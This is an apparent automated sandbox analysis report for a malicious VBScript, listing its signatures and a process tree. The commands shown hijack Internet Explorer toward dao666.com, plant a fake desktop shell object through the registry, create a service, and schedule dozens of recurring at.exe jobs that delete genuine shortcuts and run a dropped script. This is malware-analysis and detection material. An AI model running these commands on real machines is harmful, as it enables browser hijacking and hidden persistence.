Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/12/2023, 19:56

General

  • Target

    ddvip.vbs

  • Size

    1KB

  • MD5

    827e1802b44b5bf584d9804f3ed45ebd

  • SHA1

    f19dfeabbb015bc73520deb8554dc9c6bbb83564

  • SHA256

    1bf04cd426f362434b98d46901b8c77b0aadd04b93d92f778e7bd10ff404afe6

  • SHA512

    c5b91a4c576164bc572ec3e3724f5845da5754c257a81ac6eeabc7d336ac516b3e1e7c59e5197dbb4946219e8bfbd3f09d334f428885adecee88924ea0b3923e

Score
8/10

Malware Config

Signatures

  • Creates new service(s) 1 TTPs
  • Sets file to hidden 1 TTPs 6 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 6 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies registry class 44 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ddvip.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?ddvip
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4840
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?ddvip
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1272
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:988
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\tool.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1344
      • C:\Windows\system32\reg.exe
        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
        3⤵
          PID:4040
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          3⤵
          • Modifies registry class
          PID:4240
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
          3⤵
          • Modifies registry class
          PID:2456
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
          3⤵
          • Modifies registry class
          PID:1752
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
          3⤵
          • Modifies registry class
          PID:1624
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
          3⤵
          • Modifies registry class
          PID:2912
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
          3⤵
          • Registers COM server for autorun
          • Modifies registry class
          PID:440
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
          3⤵
          • Registers COM server for autorun
          • Modifies registry class
          PID:4928
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
          3⤵
          • Registers COM server for autorun
          • Modifies registry class
          PID:2200
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
          3⤵
          • Modifies registry class
          PID:2792
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
          3⤵
          • Modifies registry class
          PID:1764
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
          3⤵
          • Modifies registry class
          PID:2488
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
          3⤵
          • Modifies registry class
          PID:4856
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
          3⤵
          • Modifies registry class
          PID:4516
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
          3⤵
          • Modifies registry class
          PID:464
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
          3⤵
          • Modifies registry class
          PID:4764
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
          3⤵
          • Modifies registry class
          PID:2612
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
          3⤵
          • Modifies registry class
          PID:2556
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
          3⤵
          • Modifies registry class
          PID:1252
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
          3⤵
          • Modifies registry class
          PID:4784
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
          3⤵
          • Modifies registry class
          PID:5040
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
          3⤵
          • Modifies registry class
          PID:2920
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
          3⤵
          • Modifies registry class
          PID:2968
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Windows\system32\sc.exe
          sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
          3⤵
          • Launches sc.exe
          PID:212
        • C:\Windows\system32\sc.exe
          sc config Schedule start= auto
          3⤵
          • Launches sc.exe
          PID:4836
        • C:\Windows\system32\net.exe
          net start "Task Scheduler"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3680
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 start "Task Scheduler"
            4⤵
              PID:3064
          • C:\Windows\system32\at.exe
            at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
            3⤵
              PID:3296
            • C:\Windows\system32\at.exe
              at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
              3⤵
                PID:4088
              • C:\Windows\system32\at.exe
                at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                3⤵
                  PID:4540
                • C:\Windows\system32\at.exe
                  at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                  3⤵
                    PID:4976
                  • C:\Windows\system32\at.exe
                    at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                    3⤵
                      PID:1784
                    • C:\Windows\system32\at.exe
                      at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                      3⤵
                        PID:2944
                      • C:\Windows\system32\at.exe
                        at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                        3⤵
                          PID:5072
                        • C:\Windows\system32\at.exe
                          at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                          3⤵
                            PID:1336
                          • C:\Windows\system32\at.exe
                            at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                            3⤵
                              PID:220
                            • C:\Windows\system32\at.exe
                              at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                              3⤵
                                PID:4932
                              • C:\Windows\system32\at.exe
                                at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                3⤵
                                  PID:3012
                                • C:\Windows\system32\at.exe
                                  at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                  3⤵
                                    PID:4496
                                  • C:\Windows\system32\at.exe
                                    at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                    3⤵
                                      PID:1820
                                    • C:\Windows\system32\at.exe
                                      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                      3⤵
                                        PID:2740
                                      • C:\Windows\system32\at.exe
                                        at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                        3⤵
                                          PID:2332
                                        • C:\Windows\system32\at.exe
                                          at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                          3⤵
                                            PID:208
                                          • C:\Windows\system32\at.exe
                                            at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                            3⤵
                                              PID:780
                                            • C:\Windows\system32\at.exe
                                              at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                              3⤵
                                                PID:3036
                                              • C:\Windows\system32\at.exe
                                                at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                3⤵
                                                  PID:1032
                                                • C:\Windows\system32\at.exe
                                                  at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                  3⤵
                                                    PID:1976
                                                  • C:\Windows\system32\at.exe
                                                    at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                    3⤵
                                                      PID:4436
                                                    • C:\Windows\system32\at.exe
                                                      at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                      3⤵
                                                        PID:4272
                                                      • C:\Windows\system32\at.exe
                                                        at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                        3⤵
                                                          PID:3040
                                                        • C:\Windows\system32\at.exe
                                                          at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                          3⤵
                                                            PID:1524
                                                          • C:\Windows\system32\at.exe
                                                            at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                            3⤵
                                                              PID:3412
                                                            • C:\Windows\system32\at.exe
                                                              at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                              3⤵
                                                                PID:552
                                                              • C:\Windows\system32\at.exe
                                                                at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                3⤵
                                                                  PID:2712
                                                                • C:\Windows\system32\at.exe
                                                                  at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                  3⤵
                                                                    PID:3480
                                                                  • C:\Windows\system32\at.exe
                                                                    at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                    3⤵
                                                                      PID:2112
                                                                    • C:\Windows\system32\at.exe
                                                                      at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                      3⤵
                                                                        PID:2348
                                                                      • C:\Windows\system32\at.exe
                                                                        at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                                        3⤵
                                                                          PID:4816
                                                                        • C:\Windows\system32\at.exe
                                                                          at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                          3⤵
                                                                            PID:2808
                                                                          • C:\Windows\system32\at.exe
                                                                            at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                            3⤵
                                                                              PID:3576
                                                                            • C:\Windows\system32\at.exe
                                                                              at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                              3⤵
                                                                                PID:64
                                                                              • C:\Windows\system32\at.exe
                                                                                at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                                                3⤵
                                                                                  PID:5076
                                                                                • C:\Windows\system32\at.exe
                                                                                  at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                                  3⤵
                                                                                    PID:2644
                                                                                  • C:\Windows\system32\at.exe
                                                                                    at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                                                    3⤵
                                                                                      PID:756
                                                                                    • C:\Windows\system32\at.exe
                                                                                      at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                                      3⤵
                                                                                        PID:3868
                                                                                      • C:\Windows\system32\at.exe
                                                                                        at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                                        3⤵
                                                                                          PID:1584
                                                                                        • C:\Windows\system32\at.exe
                                                                                          at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                                                          3⤵
                                                                                            PID:4636
                                                                                          • C:\Windows\system32\at.exe
                                                                                            at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                                            3⤵
                                                                                              PID:3612
                                                                                            • C:\Windows\system32\at.exe
                                                                                              at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                                              3⤵
                                                                                                PID:4916
                                                                                              • C:\Windows\system32\at.exe
                                                                                                at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                                                                3⤵
                                                                                                  PID:3992
                                                                                                • C:\Windows\system32\at.exe
                                                                                                  at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                                                  3⤵
                                                                                                    PID:5116
                                                                                                  • C:\Windows\system32\at.exe
                                                                                                    at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                                                    3⤵
                                                                                                      PID:4888
                                                                                                    • C:\Windows\system32\at.exe
                                                                                                      at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                                                                      3⤵
                                                                                                        PID:3704
                                                                                                      • C:\Windows\system32\at.exe
                                                                                                        at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                                                        3⤵
                                                                                                          PID:2944
                                                                                                        • C:\Windows\system32\at.exe
                                                                                                          at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                                                          3⤵
                                                                                                            PID:2088
                                                                                                          • C:\Windows\system32\at.exe
                                                                                                            at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                                                                            3⤵
                                                                                                              PID:5072
                                                                                                            • C:\Windows\system32\at.exe
                                                                                                              at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                                                                              3⤵
                                                                                                                PID:220
                                                                                                              • C:\Windows\system32\at.exe
                                                                                                                at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                                                                                3⤵
                                                                                                                  PID:4980
                                                                                                                • C:\Windows\system32\at.exe
                                                                                                                  at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                                                                                  3⤵
                                                                                                                    PID:4520
                                                                                                                  • C:\Windows\system32\at.exe
                                                                                                                    at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
                                                                                                                    3⤵
                                                                                                                      PID:5016
                                                                                                                    • C:\Windows\system32\at.exe
                                                                                                                      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                                                                                      3⤵
                                                                                                                        PID:2908
                                                                                                                      • C:\Windows\system32\at.exe
                                                                                                                        at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                                                                                        3⤵
                                                                                                                          PID:3340
                                                                                                                        • C:\Windows\system32\at.exe
                                                                                                                          at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                                                                                          3⤵
                                                                                                                            PID:2596
                                                                                                                          • C:\Windows\system32\at.exe
                                                                                                                            at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
                                                                                                                            3⤵
                                                                                                                              PID:4092
                                                                                                                            • C:\Windows\system32\at.exe
                                                                                                                              at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                                                                                              3⤵
                                                                                                                                PID:4116
                                                                                                                              • C:\Windows\system32\at.exe
                                                                                                                                at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                                                                                                3⤵
                                                                                                                                  PID:4436
                                                                                                                                • C:\Windows\system32\at.exe
                                                                                                                                  at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                                                                                                  3⤵
                                                                                                                                    PID:5076
                                                                                                                                  • C:\Windows\system32\at.exe
                                                                                                                                    at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
                                                                                                                                    3⤵
                                                                                                                                      PID:4160
                                                                                                                                    • C:\Windows\system32\at.exe
                                                                                                                                      at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                                                                                                      3⤵
                                                                                                                                        PID:1808
                                                                                                                                      • C:\Windows\system32\at.exe
                                                                                                                                        at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                                                                                                        3⤵
                                                                                                                                          PID:748
                                                                                                                                        • C:\Windows\system32\at.exe
                                                                                                                                          at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                                                                                                          3⤵
                                                                                                                                            PID:1264
                                                                                                                                          • C:\Windows\system32\at.exe
                                                                                                                                            at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
                                                                                                                                            3⤵
                                                                                                                                              PID:3504
                                                                                                                                            • C:\Windows\system32\at.exe
                                                                                                                                              at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                                                                                                              3⤵
                                                                                                                                                PID:2488
                                                                                                                                              • C:\Windows\system32\at.exe
                                                                                                                                                at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                                                                                                                3⤵
                                                                                                                                                  PID:436
                                                                                                                                              • C:\Windows\System32\cmd.exe
